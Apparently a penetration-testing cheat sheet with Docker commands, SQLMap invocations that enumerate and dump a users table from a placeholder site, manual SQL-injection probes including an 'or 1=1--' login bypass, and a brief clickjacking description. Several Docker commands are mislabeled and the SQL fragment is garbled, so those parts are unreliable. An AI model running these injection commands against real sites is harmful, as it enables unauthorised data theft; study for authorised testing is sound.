Cyber Security | Web Development

 Basic Docker Image Commands Pull the docker image from the online resource docker pull <docker-image> List all Docker images in the machine docker ps -a Remove Docker from the machine docker rm --force <docker-image> Stop the docker image in the machine docker container stop <docker-image> Start the docker image in the machine docker container start <docker-image> Remove all docker images from the machine docker rm -f $(docker ps -a -q)

 SQLMap We have to copy the request from the burp suite and paste it into the .txt file format. Type -1 Safest technique: level 1 & risk 1 level 1 & risk 2 level 2 & risk 1 level 2 & risk 2 Commands: sqlmap -r test.txt --banner sqlmap -r test.txt --banner --level 2 --risk 1 sqlmap -r test.txt --banner --dbms=PostgreSQL --level 2 --risk 1  => if you found database sqlmap -r test.txt --banner --dbms=PostgreSQL --level 2 --risk 1 Type -2 Error based SQL - Injection https://testdemo.com/sports.php?id=1' https://testdemo.com/sports.php?id=2-1 https://testdemo.com/sports.php?id=3-1 https://testdemo.com/sports.php?id=1_sleep(11) SQLmap TOOL: python sqlmap.py -u https://testdemo.com/sports.php?id=1 --dbs sqlmap -u https://testdemo.com/sports.php?id=1 --dbs sqlmap -u https://testdemo.com/sports.php?id=1 acuart --tables sqlmap -u https://testdemo.com/sports.php?id=1 acuart  --tables users --dump Email = SELECT*FROM users WHERE username='or 1=1--' password='qwer

  Clickjacking Description: Clickjacking is  an attack that tricks a user into clicking a webpage element that is invisible or disguised as another element . This can cause users to unwittingly download malware, visit malicious web pages, provide credentials or sensitive information, transfer money, or purchase products online. Impact: The user assumes that they're entering their information into a usual form but they're actually entering it in fields the hacker has overlaid on the UI . Link URL: https://clickjacker.io/ POC: The simplest way to identify our application is from a clickjacking attack.